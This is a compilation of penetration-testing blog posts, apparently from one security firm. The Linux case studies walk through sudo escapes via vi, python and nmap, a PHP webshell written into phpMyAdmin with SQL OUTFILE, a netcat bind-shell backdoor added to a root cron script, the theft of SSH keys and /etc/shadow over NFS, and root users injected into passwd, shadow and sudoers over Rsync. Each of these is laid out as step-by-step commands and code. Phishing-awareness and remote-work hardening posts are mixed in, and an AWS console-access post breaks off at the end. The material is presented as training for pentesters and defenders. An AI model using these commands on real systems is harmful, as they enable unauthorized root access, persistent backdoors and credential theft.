Below is a command example:

vi
ESC (press esc key)
:!whoami

Below are some example screenshots showing the process.

Vibreakout

Exploiting Sudo Python

People also love Python.  It’s a scripting language used in every industry vertical and isn’t going away any time soon. It’s actually pretty rare to see Python or other programming engines broadly allowed to execute through sudo, but we have seen it a few times so I thought I’d share an example here.  Python, like most robust scripting and programming languages, supports arbitrary command execution capabilities by default.

Below is a basic command example and a quick video for the sake of illustration:

sudo python –c “import os;os.system(‘whoami’)”

Here are a few quick video examples.

Exploiting Sudo Nmap

Most privilege escalation involves manipulating an application running as a higher privilege into running your code or commands.  One of the many techniques used by attackers is to simply leverage the native functionality of the target application. One common theme we see across many applications is the ability to create and load custom modules, plug-ins, or add-ons.

For the sake of this scenario, let’s assume we can run Nmap using sudo and now we want to use it’s functionality to execute operating system commands.

When I see that an application like Nmap can be run through sudo, I typically follow a process similar to the one below:

  1. Does Nmap allow me to directly execute os commands?
    No (only in old versions using the -–interactive flag and !whoami)
  2. Does Nmap allow me to extend its functionality?
    Yes, it allows users to load and execute custom .nse modules.
  3. What programming language are the .nse modules written in?
    Nmap .nse modules use the LUA scripting engine.
  4. Does the LUA scripting engine support OS command execution?
    Yep. So let’s build a LUA module to execute operating system commands. It’s important to note that we could potentially write a module to execute shell code or call specific APIs, but in this example we’ll keep it simple.

Let’s assume at this point you spent a little time reviewing existing Nmap modules/LUA capabilities and developed the following .nse module.

--- SAMPLE SCRIPT
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local command  = stdnse.get_script_args(SCRIPT_NAME .. ".command") or nil
print("Command Output:")
local t = os.execute(command)
description = [[This is a basic script for executing os commands through a Nmap nse module (lua script).]]
---
-- @usage
-- nmap --script=./exec.nse --script-args='command=whoami'
-- @output
-- Output:
-- root
-- @args command
author = "Scott Sutherland"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "discovery", "safe"}
portrule = shortport.http
action = function(host,port)   
end

Once the module is copied to the target system, you can then run your custom module through Nmap. Below you can see the module successfully runs as our unprivileged user.

nmap --script=./exec --script-args='command=whoami'
Sudo
nmap --script=./exec --script-args='command=cat /etc/shadow'
Sudo

Now, you can see we’re able to run arbitrary commands in the root user’s context, when running our new Nmap module through sudo.

So that’s the Nmap example. Also, for the fun of it, we occasionally configure ncat in sudoers when hosting CTFs, but to be honest I’ve never seen that in the real world. Either way, the video below shows both the Nmap and ncat scenarios.

Wrap Up

In this blog we talked about different ways to approach SSH password guessing and attacking sudo applications. I hope it was useful information for those new the security community.  Good luck and hack responsibly!

Back

Keeping Your Organization Secure While Sending Your Employees to Work from Home

Enabling Employees to Work from Home

All of a sudden, the world is facing a pandemic, and you are asking all your team members to work from home. Have you really considered all the security implications of moving to a remote workforce model? Chances are you and others are more focused on just making sure people can work effectively and are less focused on security. But at times of crisis – hackers are known to increase their efforts to take advantage of any weak links they can find in an organization’s infrastructure.

I travel significantly for work and have always been fortunate to have a good setup to be able to effectively work from anywhere with a reliable Internet connection. Not everyone is this fortunate, nor do many people have the experience of working remotely until now.

Managing Host-Based Security

Host-based security represents a large attack surface that is rapidly evolving as employees continue to become more mobile. Let’s discuss some key things organizations need to keep in mind as they migrate their teams to be effective while working from home.

1. Education/Employee Training

Before we start talking about technical controls that are important to consider, it’s necessary to start with the people factor. All the technical controls can easily be rendered useless if your team members are not properly trained on security. People need to be trained on how to securely access and manage the organization’s IT assets. With a rise in phishing attacks, it’s important that training not only cover secure ways to access different systems, but also how to avoid potential scams. Education is paramount in making sure that the organization is safe, and people in the organization are not making decisions that can have adverse effects from a security and privacy perspective.

2. Workstation Image Security

Most organizations deploy laptops using a standard set of system images and configurations. The problem with using standard images and configurations is that it becomes challenging to secure a workstation in the event that the laptop is lost, stolen, and/or compromised by a threat actor.

Here are some things to consider while trying to secure laptops and mobile devices:

  • Ensure all workstation images are configured based on a secure baseline.
  • Make sure the secure baselines are managed and updated based on business needs.
  • Track critical operating system and application patches, and ensure that they are applied.
  • Review application and management scripts for vulnerabilities and common attack patterns.
  • Enable full-disk encryption.
  • Perform regular security testing for each workstation image – typically organizations have multiple images that are in use – e.g. Windows 7, Windows 10, MacOS, etc.

3. Virtual Desktop Infrastructure (VDI) Security

Many organizations are moving away from physical laptops and are having their employees access applications and desktops through solutions leveraging VDIs. A common solution that is used widely is provided by Citrix. This allows employees to connect to an organization’s systems by remotely connecting to a virtual desktop server (from their personal computer or mobile device like a tablet or a smartphone) working directly from where the virtual desktop is hosted.

The following are some things that are important to consider in this type of a scenario:

  • Enforce multi-factor authentication (MFA) for all VDI portals and VPN access.
  • Ensure that the VDI is configured so that users cannot exfiltrate data through shared drives, the clipboard, email, websites, printer access, or any other common egress point.
  • Proper access control so users cannot easily pivot to critical internal resources like databases, application servers and domain controllers.
  • Lock down applications to prevent unauthorized access to the operating system resources and ensure that they have the least amount of privileges enabled to function properly.

4. Windows and Linux Sever Security

Unlike laptops/workstations and VDI portals which are directly exposed to the Internet, once an attacker can pivot into the environment, they usually find it trivial to identify Windows and Linux servers on the network to target. Server Operating Systems need to be configured, reviewed and hardened to reduce the attack surface. Vulnerability scanning by itself is usually not enough since it won’t expose vulnerabilities that could be used by authenticated attackers.

5. z/OS Mainframe Security

Windows and Linux servers are typically deployed using standard images, but z/OS mainframe tend to be more unique. In most environments, the mainframe configurations are not centrally managed as effectively as their Windows and Linux counterparts, which is why there are many inconsistencies in how mainframes are configured, leading to vulnerabilities that are often accessible to domain users.

It’s important to consider the following:

  • Check for missing critical application and operating system patches on a regular cadence.
  • Centrally manage and implement z/OS mainframe configurations based on a secure baseline.
  • Check if Active Directory domain users can log into z/OS mainframe applications or have direct access through SSH or other protocols.
  • Periodically perform penetration testing and security reviews of your deployed z/OS mainframes.
Back

Linux Hacking Case Studies Part 3: phpMyAdmin

This blog will walk-through how to attack insecure phpMyAdmin configurations and world writable files to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking phpMyAdmin can be applied to many web applications. This should be a fun walk-through for people new to penetration testing, or those looking for a phpMyAdmin attack refresher.

This is the third of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below are links to the first two blogs in the series:

Below is an overview of what will be covered in this blog:

What is phpMyAdmin?

phpMyAdmin is a web application that can be used to manage local MySQL databases. It’s commonly found in environments of all sizes and occasionally accessible directly from the internet. It’s often used as part of open source projects and as a result some administrators don’t realize that it’s been installed in their environment. Developers also use it to temporarily spin up/down basic test environments, and we commonly see those turn into permanently unmanaged installations on corporate networks. Since we see phpMyAdmin so often, we thought it would be worth sharing a basic overview of how to use it to get a foothold on a system.
To get started, let’s talk about findings phpMyAdmin instances.

Accessing NATed Environments

At the risk of adding unnecessary complexity to this scenario, we’re going to assume that all of our tests are being conducted from a system that’s in a NATed environment.  Meaning that we’re pretending to connect to a SSH server that is exposed to the internet through a firewall, but the environment we’re attacking is on the other side of the firewall.

Finding PHPMyAdmin

phpMyAdmin is a web application that’s usually hosted by Apache, but it can be hosted by other web servers.  Sometimes it’s installed in the web root directory,  but more commonly we see it installed off of the /phpMyAdmin path. For example, https://server/phpMyAdmin.

With this knowledge let’s start searching for web serves that might be hosting phpMyAdmin instances using our favorite port scanner Nmap:

nmap -sT -sV -p80,443 192.168.1.0/24 -oA phpMyAdmin_scan

Next we can quickly search the phpMyAdmin_scan.gnmap output file for open ports with the command below:

grep -i "open" phpMyAdmin_scan.gnmap


We can see a few Apache instances. We can now target those to determine if phpMyAdmin is being hosted on the webroot or /phpMyAdmin path.

Since we are SSHing into a NATed environment we are going to forward port 80 through an SSH tunnel to access the web server hosted on 192.168.1.171.  In most cases you wont have to do any port forwarding, but I thought it would be fun to cover the scenario. A detailed overview of SSH tunneling and SOCKS proxies are out of scope for this blog, but below is my attempt to illustrate what we’re doing.

Tunnel

Below are a couple of options for SSH tunnling to the target web server.

Linux SSH Client

ssh pentest@ssh.servers.com -L 2222:192.168.1.171:80

Windows PuTTY Client

Once port forwarding is configured, we’re able to access phpMyAdmin by navigating to https://127.0.0.1:2222/phpmyadmin in our local web browser.

Dictionary Attacks against PHPMyAdmin

Now that we’ve found a phpMyAdmin instance the next step is usually to test for default credentials, which are root:[blank].   For the sake of this lab we’ll assume the default has been changed, but all is not lost.  From here we can conduct a basic dictionary attack to test for common user/password combinations without causing trouble.  However, you should always research the web application you’re performing dictionary attacks against to ensure that you don’t cause account lockouts.

There are a lot of great word lists out there, but for the sake of this scenario we kept it simple with the list below.

User List:

echo root >> /tmp/users.txt
echo admin >> /tmp/users.txt
echo user >> /tmp/users.txt

Password List:

echo password >> /tmp/passwords.txt
echo Password >> /tmp/passwords.txt

You can use a tool like Burp Intruder to conduct dictionary attacks against phpMyAdmin (and other web applications), but a nice article is already available on the topic here.  So to show an alternative we’ll use Metasploit since it has a module built for the task.  Below are some commands to get you started.

Note: Metasploit is installed on the Kali Linux distribution by default.

msfconsole
use auxiliary/scanner/http/phpMyAdmin_login
set rhosts 192.168.1.171
set USER_AS_PASS true
set targeturi /phpMyAdmin/index.php
set user_file /tmp/users.txt
set pass_file /tmp/passwords.txt
run

Below is a screenshot of what a successful dictionary attack looks like.

Bf

If the dictionary attack discovers valid credentials, you’re ready to login and move onto the next step. Below is a short video showing the dictionary attack process using Metasploit.

Uploading WebShells through PHPMyAdmin

Now that we’ve guessed the password, the goal is to determine if there is any functionality that may allow us to execute operating system commands on the server.  MySQL supports user defined functions that could be used, but instead we’re going to write a webshell to the webroot using the OUTFILE function.

Note: In most multi-tiered environments writing a webshell to the webroot through SQL injection wouldn’t work, because the database and web server are not hosted on the same system. phpMyAdmin is a bit of an exception in that regard, but LAMP, WAMP, and XAMPP are other examples. It’s also worth noting that in some environments the mysql services account may not have write access to the webroot or phhMyAdmin directories.

MySQL Code to Write a Webshell

To get started click the “SQL” button to view the query window.  Then execute the query below to upload the custom PHP webshell that can be used to execute commands on the operating system as the Apache service account. Remember that phpMyAdmin may not always be installed to /var/www/phpMyAdmin when executing this in real environments.

SELECT "<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET['cmd']) {​​system($_GET['cmd']);}​​ ?> </pre></BODY></HTML>"

INTO OUTFILE '/var/www/phpMyAdmin/cmd.php'

The actual code can be downloaded here, but below is screenshot showing it in context.

Uploadwebshell

The webshell should now be available at https://127.0.0.1:2222/phpMyAdmin/cmd.php.  With that in hand we can start issuing OS commands and begin privilege escalation.
Below are a few commands to start with:

whoami 
ls –al
ls /
Ls

Below is a quick video illustrating the process.

Note: When you’re all done with your webshell make sure to remove it.  Also, consider adding authentication to your webshells so you’re not opening up holes in client environments.

Locating World Writable Files

World-writable files and folders can be written to by any user.  They aren’t implicitly bad, but when those files are directly or indirectly executed by the root user they can be used to escalate privileges.

Finding World-Writable Files

Below is the command we’ll run through our webshell to locate potentially exploitable world writable files.

find / -maxdepth 3 -type d -perm -777 2>/dev/null
Ww A

From here we can start exploring some of the affected files and looking for potentially exploitable targets.

Exploiting a World Writable Root Cron Job Script

In our example below, the /scripts/ directory is world-writable.  It appears to contain a script that is run by the a root cron job.  While this isn’t incredibly common, we have seen it in the wild.  The general idea can be applied to sudo scripts as well.  There are a lot of things we could write to the root cron job script, but for fun we are going to add a line to the script that will start a netcat listener as root.  Then we can connect to the listener from our Linux system.

Display Directory Listing for Scripts

ls /scripts
cat /scripts/rootcron.sh
Scriptdirectory

Add Netcat Backdoor to Root’s Crontab Script

echo "nc -l -p12345 -e /usr/bin/sh& 2>/dev/null" >> /scripts/rootcron.sh
cat /scripts/rootcron.sh
Writetoscript

You’ll have to wait for the cron job to trigger, but after that you should be able to connect the netcat backdoor listening on port 12345 from the Linux system.

Below are a few commands you might want to try once connected:

nc 192.168.1.171 12345
whoami
pwd
cat /etc/shadow
w
Rootshell

I acknowledge that this seems like an exaggerated scenario, but sometimes reality is stranger than fiction. While this isn’t a common occurrence we have seen very similar scenarios during real penetration tests.  For scenarios that require a reverse shell instead of a bind shell, pentestmonkey.net has a few documented options here.   However, below is a quick video showing the netcat backdoor installation and access.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable phpMyAdmin installation and a world writable script being executed by a root cron job . While there are many ways to reach the same end, I think the moral of this story is that web admin interfaces can be soft targets, and often support functionality that can lead to command execution.  Also, performing web application discovery and maintenance is an important part of vulnerability management that is often overlooked. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured web platforms like phpMyAdmin in their environments. Good luck and hack responsibly!

Back

Linux Hacking Case Studies Part 2: NFS

This blog will walk through how to attack insecure NFS exports and setuid configurations in order to gain a root shell on a Linux system. This should be a fun overview for people new to penetration testing, or those looking for a NFS refresher. This is the second of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.  The first blog focused on attacking Rsync and can be found here.

Below is an overview of what will be covered in this blog:

What is NFS and Why Should I Care?

Network File System (NFS) is a clear text protocol that is used to transfer files between systems. So what’s the problem? Insecurely configured NFS servers are found during our internal network penetration tests about half of the time. The weak configurations often provide unauthorized access to sensitive data and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the NFS configuration.

Remotely accessing directories shared through NFS exports requires two things, mount access and file access.

  1. Mount access can be restricted by hostname or IP in /etc/exports, but in many cases no restrictions are applied.  It’s also worth noting that IP and hostnames are easy to impersonate (assuming you know what to impersonate).
  2. File access is made possible by configuring exports in /etc/exports and labeling them as readable/writable. File access is then restricted by the connecting user’s UID, which can be spoofed.  However, it should be noted that there are some mitigating controls such as “root squashing”, that can be enabled in /etc/exports to prevent access from a UID of 0 (root).

The Major Issue with NFS

If it’s possible to mount NFS exports, the UID can usually be manipulated on the client system to bypass file permissions configured on the directory being made available via the NFS export. Access could also be accidentally given if the UID on the file and the UID of the connecting user are the same.

Below is a overview of how unintended access can occur:

  1. On “Server 1” there is a user named “user1” with a UID of 1111.
  2. User1 creates a file named “secret” that is only accessible to themselves and root using a command like “chmod 600 secret”.
  3. A read/write NFS export is then created on Server1 with no IP restrictions that maps to the directory containing user1’s secret file.
  4. On a separate Linux Client System, there is a user named “user2” that also has a UID of 1111.   When user2 mounts the NFS export hosted by Server1, they can read the secret file, because their UID matches the UID of the secret file’s owner (user1 on server1).

Below is an attempt at illustrating the scenario.

Nfs

Finding NFS Servers

NFS listens on UDP/TCP ports 111 and 2049.  Use common tools like nmap identify open NFS ports.

nmap -sS -pT:2049,111,U:2049,111 192.168.1.0/24 -oA nfs_scan
grep -i "open" nfs_scan.gnmap
Nfs

Use common tools like nmap or rpcinfo to determine the versions of NFS currently supported. This may be important later. We want to force the use of version 3 or below so we can list and impersonate the UID of the file owners. If root squashing is enabled that may be a requirement for file access.

Enumerate support NFS versions with Nmap:

nmap -sV -p111,2049 192.168.1.171

Enumerate support NFS versions with rpcinfo:

apt-get install nfs-client
rpcinfo -p 192.168.1.171
Nfs

Below is a short video that shows the NFS server discovery process.

Enumerating NFS Exports

Now we want to list the available NFS exports on the remote server using Metasploit or showmount.

Metasploit example:

root@kali:~# msfconsole
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set rhosts 192.168.1.171
msf auxiliary(nfsmount) > run
Nfs

Showmount example:

apt-get install samba
showmount -e 192.168.1.171
Nfs

Mounting NFS Exports

Now we want to mount the available NFS exports while running as root. Be sure to use the “-o vers=3” flag to ensure that you can view the UIDs of the file owners.  Below are some options for mounting the export.

mkdir demo
mount -o vers=3 192.168.1.171:/home demo
mount -o vers=3 192.168.1.222:/home demo -o nolock

or

mount -t nfs -o vers=3 192.168.1.171:/home demo

or

mount -t nfs4 -o proto=tcp,port=2049 192.168.1.171:/home demo
Nfs

Viewing UIDs of NFS Exported Directories and Files

If you have full access to everything then root squashing may not be enabled. However, if you get access denied messages, then you’ll have to impersonate the UID of the file owner and remount the NFS export to get access (not covered in this blog).

List UIDs using mounted drive:

ls -an
Nfs

List UIDs using nmap:

nmap --script=nfs-ls 192.168.1.171 -p 111
Nfs

Searching for Passwords and Private Keys (User Access)

Alrighty, let’s assume you were able to access the NFS with root or another user.  Now it’s time to try to find passwords and keys to access the remote server.  Private keys are typically found in /home/<user>/.ssh directories, but passwords are often all over the place.

Find files with “Password” in the name:

cd demo
find ./ -name "*password*"
cat ./test/password.txt
Nfs

Find private keys in .ssh directories:

mount 192.168.1.222:/ demo2/
cd demo2
find ./ -name "id_rsa"
cat ./root/.ssh/id_rsa
Nfs

Below is a short via showing the whole mounting and file searching process.

Targeting Setuid (Getting Root Access)

Now that we have an interactive shell as a least privilege user (test), there are lots of privilege escalation paths we could take, but let’s focus on setuid binaries for this round. Binaries can be configured with the setuid flag, which allows users to execute them as the binary’s owner.  Similarly, binaries configured with the setguid flag, which allow users to execute the flag binary as the group associated with the file.  This can be a good and bad thing for system administrators.

  • The Good news is that setuid binaries can be used to safely execute privileged commands such as passwd.
  • The Bad news is that setuid binaries can often be used for privilege escalation if they are owned by root and allow direct execution of arbitrary commands or indirect execution of arbitrary commands through plugins/modules.

Below are commands that can be used to search for setuid and setguid binaries.

Find Setuid Binaries

find / -perm -u=s -type f 2>/dev/null

Find Setguid Binaries

find / -perm -g=s -type f 2>/dev/null

Below is an example screenshot you might encounter during a pentest.

Nfs

Once again, the goal is usually to get the binary to execute arbitrary code as root for you. In real world scenarios you’ll likely have to do a little research or reversing of target setuid binaries in order to determine the best way to do that. In our case, the /home/test/exec binary allows us to directly execute OS commands as root. The source code for the example application can be found at https://github.com/nullbind/Other-Projects/blob/master/random/exec.c.

Below are the sample commands and a screenshot:

cd /home/test/
./exec
whoami
Nfs

As you can see from the image above, it was possible to execute arbitrary commands as root without too much effort. Below is a video showing the whole setuid exploitation process in action.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable NFS export and insecure setuid binary . While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured NFS servers. Good luck and hack responsibly!

Back

Staying Safe Online During the COVID-19 Pandemic

Similarities Between Computer Viruses and Medical Viruses

There’s a reason why a computer virus is called a “virus” – they have many similarities with medical viruses (like COVID-19) that have a severe impact on your personal health. Just like Coronavirus can hide its symptoms and be contagious for long periods of time before causing any visible damage, a computer virus operates no different.

With how interconnected we are in today’s digital world, a computer virus (a “wormable” remote code execution vulnerability like EternalDarkness that affects Microsoft Server Message Block SMBv3) can start infecting and spreading in a matter of minutes. Typically, these types of virally distributing malware can also keep symptoms hidden, like a real virus, until the exploit payload is executed causing damage to computer systems.

Plenty of Phish in the Sea – Hackers Taking Advantage at a Time of Fear and Uncertainty

It seems like during any time of a disaster, phishing emails increase as well. Hackers take advantage of the human element, especially at a time of fear and uncertainty – like during the major pandemic that we are currently facing. Naturally, due to people’s fears and the seriousness of the pandemic, people are actively seeking as much information as they can to keep themselves, their families, and their loved ones safe. Preying on the human element, hackers are actively sending various types of phishing emails related to the Coronavirus. The volume of these phishing emails have reportedly increased significantly over the last couple of weeks. Some of the most common examples of these phishing emails are fake emails:

  • From a doctor with attachments that claim to have certain steps to avoid Coronavirus and encourages the recipient to share the attachment with family and friends.
  • From business partners with attachments that supposedly contain FAQs regarding the Coronavirus.
  • From company management, a link to a meeting recording discussing Coronavirus and how it’s being handled by the organization – with a malicious link embedded in the email instead of a recording.
  • From a fake employee claiming that an employee in the company has contracted the Coronavirus and attached is an advisory that all employees are encouraged to read.
  • From an organization that is giving away free equipment and protective gear (like masks) and needs the recipient to click on a link to confirm the delivery address.
  • From HR talking about how they are giving extra money to their employees available only during the next few hours.
  • From the IT service desk asking employees to follow a link and take a survey.
  • From the CDC with a malicious link about new confirmed cases in the recipient’s city.

An Ounce of Prevention Goes a Long Way

Taking a little bit of precaution, especially when it comes to getting infected by malware or having your personal data stolen, goes a long way. The headache and hassle of having to deal with a personal data breach or ransomware attack can easily be avoided, if people are vigilant and well informed about determining whether an email is a phishing email or not.

Common Symptoms of a Phishing Email

1. Requesting Private and Personal Information

Just like you don’t expect the prince of some African country to need your banking information to help them move money around, if you’re receiving an email about a pandemic or issue related to a topic focused on the public health, there’s absolutely no reason why they would need to ask you to click on a link to log in with your user credentials or personal details. Just by using some common sense, you should be able to determine that there’s something very phishy about that email. This should be a clear sign that the email is malicious.

2. Unnecessary Sense of Urgency or Fear Mongering

When it comes to sharing information about a pandemic or any crisis, any given agency or legitimate source of information would most likely use language that’s calm and credible. The subject of the email or the body will typically not be something that sounds extra alarming. In the case that the email is actually necessary to convey an urgent message, it won’t require the recipient to click on a link or require the recipient to open an attachment to get the information. Instead a legitimate email would contain the relevant information in the email body itself.

3. Sender’s Email Address is Unfamiliar or Suspicious

Many phishing emails claim to come from organizations that work in an official capacity during the time of the crisis (e.g. World Health Organization or Center for Disease Control). Emails claiming to be from these organizations with multiple attachments or links to additional resources and information regarding the crisis at hand but coming from email addresses ending in @hotmail.com or @aol.com makes absolutely no sense. Hopefully these will be caught by your email spam filter. Unfortunately, some do slip by those filters, and it should be very clear to you that these emails are clearly phishing attempts.

4. Companies Will Usually Use Your Name to Greet You in Emails

Most companies or organizations where you might be a customer, or your doctor’s office for example, will typically have access to some basic information like your name. When they send out communications to you, they will address you with your name instead of a generic salutation like “Dear Client” or “Dear Subscriber.” There are also many cases where hackers will just avoid salutations, especially if they are sending emails offering special deals or requesting the recipient to click on links to go somewhere to potentially get something for free or win something.

5. Poor Spelling and Grammar

Criminals on the internet or fake royal family members from different continents don’t necessarily have the best education, and in many cases, the language in which they are sending out phishing emails may not be their primary language. Therefore, it’s very common that phishing emails will be riddled with spelling errors or poor grammar. Finding oddly structured sentences, weird capitalizations, or just the usage of a completely wrong word or phrase are clear signs of phishing emails.

6. Low Resolution Graphics in Emails

Cybercriminals will often copy and paste graphics for logos in emails from different parts of the Internet. An email claiming to be from the CDC with information about the Coronavirus, but the logo looks a little fuzzy, or tiny, should be a clear red flag that the email is malicious or fake – it’s a clear sign that the sender of the email doesn’t work for the organization they are claiming to be from.

Back

Linux Hacking Case Studies Part 1: Rsync

This blog will walk through how to attack insecure Rsync configurations in order to gain a root shell on a Linux system. This should be a fun walkthrough for people new to penetration testing, or those looking for a Rsync refresher. This will be the first of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below is an overview of what will be covered in this blog:

What is RSYNC and Why Should I Care?

Rsync is a utility for transferring and synchronizing files between two servers (usually Linux).  It determines synchronization by checking file sizes and timestamps. So what’s the problem?
Insecurely configured Rsync servers are found during our network penetration tests about a third of the time. The weak configurations often provide unauthorized access to sensitive data, and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the Rsync configuration.

Remotely accessing directories shared through Rsync requires two things, file share access and file permissions.

  1. File Share Access can be defined in /etc/Rsyncd.conf to provide anonymous or authenticated access.
  2. File Permissions can also be defined in /etc/Rsyncd.conf by defining the user that the Rsync service will run as. If Rsync is configured to run as root, then anyone allowed to connect can access the shared files with the privileges of the root user.

Below is an example of Rsyncd.conf file that allows anonymous root access to the entire file system:

motd file = /etc/Rsyncd.motd
lock file = /var/run/Rsync.lock
log file = /var/log/Rsyncd.log
pid file = /var/run/Rsyncd.pid

[files]
path = /
comment = Remote file share.
uid = 0
gid = 0
read only = no
list = yes

Finding RSYNC Servers

By default, the Rsync service listens on port 873. It’s often found configured without authentication or IP restrictions. You can discover Rsync services using tools like nmap.

nmap -sS -sV -p873 192.168.1.0/24 –oA Rsync_scan
grep –i "open" Rsync_scan.gnmap
Rsync

Enumerating RSYNC Shares

Below are commands that can be used to list the available directories and files.

List directory

rsync 192.168.1.171::

List sub directory contents

rsync 192.168.1.171::files

List directories and files recursively

rsync -r 192.168.1.171::files/tmp/
Rsync

Downloading Files via RSYNC

Below are commands that can be used to download the identified files via Rsync.  This makes it easy to pull down files containing passwords and sensitive data.

Download files

rsync 192.168.1.171::files/home/test/mypassword.txt .

Download folders

rsync -r 192.168.1.171::files/home/test/
Rsync

Uploading Files via RSYNC

Below are commands that can be used to upload files using Rsync.  This can be handy for dropping scripts and binaries into folder locations where they will be automatically executed.

Upload files

rsync ./myfile.txt 192.168.1.171::files/home/test

Upload folders

rsync -r ./myfolder 192.168.1.171::files/home/test
Rsync

Creating a New User through Rsync

If Rsync is configured to run as root and is anonymously accessible, it’s possible to create a new privileged Linux user by modifying the shadow, passwd, group, and sudoers files directly.

Note: The same general approach can be used for any vulnerability that provides full write access to the OS. A few other examples include NFS exports and uploading web shells running as root.

Creating the Home Directory
Let’s start by creating our new user’s home directory.

# Create local work directories
mkdir demo
mkdir backup
cd demo

# Create new user’s home directory
mkdir ./myuser
rsync -r ./myuser 192.168.1.171::files/home

Create the Shadow File Entry
The /etc/shadow file is the Linux password file that contains user information such as home directories and encrypted passwords. It is only accessible by root.

To inject a new user entry via Rsync you’ll have to:

  1. Generate a password.
  2. Create the line to inject.
  3. Download /etc/shadow. (and backup)
  4. Append the new user to the end of /etc/shadow
  5. Upload / Overwrite the existing /etc/shadow

Note: Make sure to create a new user that doesn’t already exist on the system. 😉

Create Encrypted Password:

openssl passwd -crypt password123

Add New User Entry to /etc/shadow:

rsync -R 192.168.1.171::files/etc/shadow .
cp ./etc/shadow ../backup
echo "myuser:MjHKz4C0Z0VCI:17861:0:99999:7:::" >> ./etc/shadow
rsync ./etc/shadow 192.168.1.171::files/etc/

Create Passwd File Entry
The /etc/passwd file is used to keep track of registered users that have access to the system. It does not contain encrypted password. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/passwd. (and back it up so you can restore state later)
  3. Append the new user entry to the end of passwd.
  4. Upload / Overwrite the existing /etc/passwd

Note: Feel free to change to uid, but make sure it matches the value set in the /etc/group file. 🙂 In this case the UID/GUID are 1021.

Add New User Entry to /etc/passwd:

rsync -R 192.168.1.171::files/etc/passwd .
cp ./etc/passwd ../backup
echo "myuser:x:1021:1021::/home/myuser:/bin/bash" >> ./etc/passwd
rsync ./etc/passwd 192.168.1.171::files/etc/

Create the Group File Entry
The /etc/group file is used to keep track of registered group information on the system. It does not contain encrypted password. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/group. (and backup, just in case)
  3. Append the new user entry to the end of group.
  4. Upload / Overwrite the existing /etc/group file.

Note: Feel free to change to uid, but make sure it matches the value set in the /etc/passwd file. 🙂 In this case the UID/GUID are 1021.

Add New User Entry to /etc/group:

rsync -R 192.168.1.171::files/etc/group .
cp ./etc/group ../backup
echo "myuser:x:1021:" >> ./etc/group
rsync ./etc/group 192.168.1.171::files/etc/

Create Sudoers File Entry
The /etc/sudoers file contains a list of users that are allowed to run commands as root using the sudo command. It can only be read by root. We are going to modify it to allow the new user to execute any command through sudo.

To inject a entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/sudoers. (and backup, just in case)
  3. Append the new user entry to the end of sudoers.
  4. Upload / Overwrite the existing /etc/sudoers file.

Add New User Entry to /etc/sudoers:

rsync -R 192.168.1.171::files/etc/sudoers .
cp ./etc/sudoers ../backup
echo "myuser ALL=(ALL) NOPASSWD:ALL" >> ./etc/sudoers   
rsync ./etc/sudoers 192.168.1.171::files/etc/

Now you can simply log into the server via SSH using your newly created user and sudo sh to root!

Attacking Rsync Demo Video

Below is a video created in a lab environment that shows the process of identifying and exploiting an insecurely configured Rsync server to gain a root shell. While it see too simple to be true, it is based on configurations exploited during real penetration tests.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerability that provided write access.  While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems.   Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured Rsync servers.  Good luck and hack responsibly!

The next blog in the series focuses on NFS and setuid binaries, it can be found here.

References

Back

Gaining AWS Console Access via API Keys

For adversarial scenarios, AWS console access is better than the APIs. We’ll walk you through our research process here, and release a new tool we’ve built!

When there’s a will…

We’re frequently asked by clients to test applications, networks and/or infrastructure hosted on Amazon Web Services (AWS). As a part of these assessments, we’ll oftentimes locate active IAM credentials in a variety of ways. These credentials allow for the holder to perform privileged actions in AWS services within an AWS account.

These credentials come in two forms, both of which work with the AWS CLI:

  • Permanent credentials
    Usually representing individual IAM users, these contain an access key (which generally starts with AKIA) and secret key.
  • Temporary credentials
    Generally come from assuming an IAM role, these also contain a session token (and an access key starting with ASIA). Generally speaking, these credentials are used by your applications or users with the AWS CLI or SDK to integrate with different AWS services.

However, neither of these are ideal for a penetration test. The AWS CLI often requires multiple calls to obtain relevant data, and the SDK would require developing tools specific for an attack scenario or vulnerability.

Recently, we had a perfect example of this. While performing a cloud penetration test with Karl Fosaaen, we located some hardcoded AWS credentials within a piece of management infrastructure in a client’s account. These credentials worked great with AWS APIs, and were really useful for tools like ScoutSuite and Pacu. Both of these tools utilize the AWS APIs/CLIs/SDKs, which generally have more power than the console.

However, it’s easy to forget specific CLI syntax for even the simplest of commands. The below example shows a pretty simple recon activity we might perform – describing running EC2 instances. At the top, we see the AWS console interface’s easy-to-use filter option. On the bottom, we see my attempts to remember the specific filter name needed.

Compare
Now, was it “instance-state,” “state,” “status…?”

Rather than trudge through the AWS CLI syntax, we investigated methods to gain access to the AWS console.

…there’s a way.

Fortunately, AWS has such a mechanism for gaining access to the AWS console using API credentials – the AWS federation endpoint.

On the Topic of Federation

